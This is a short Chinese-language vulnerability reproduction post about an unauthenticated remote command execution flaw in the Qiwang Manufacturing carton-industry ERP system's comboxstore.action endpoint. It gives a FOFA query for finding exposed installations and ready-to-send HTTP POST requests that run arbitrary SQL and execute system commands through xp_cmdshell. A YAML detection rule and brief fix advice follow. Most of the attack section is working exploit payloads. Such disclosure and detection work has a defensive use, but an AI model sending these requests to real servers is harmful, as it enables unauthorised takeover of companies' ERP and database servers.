企望制造ERP系统RCE漏洞复现

产品简介

企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。 erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。

漏洞概述

由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。

复现环境

FOFA:title="企望制造ERP系统"

漏洞复现

http://your-ip/mainFunctions/comboxstore.action

出现以上情况则存在漏洞
POC

POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip
 
comboxsql=exec%20xp_cmdshell%20'whoami'

执行SQL语句

POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip
 
comboxsql=select%20@@version;

利用 xp_cmdshell RCE

POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip
 
comboxsql=exec%20xp_cmdshell%20'whoami'

检测POC规则编写

params: []
name: 企望制造ERP系统RCE漏洞
set: {}
rules:
- method: GET
  path: /mainFunctions/comboxstore.action
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"'data':[")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

修复建议

关闭互联网访问权限,将该接口设置权限认证(仅允许内部访问),修补补丁。

最后修改:2023 年 12 月 05 日
如果觉得我的文章对你有用,请随意赞赏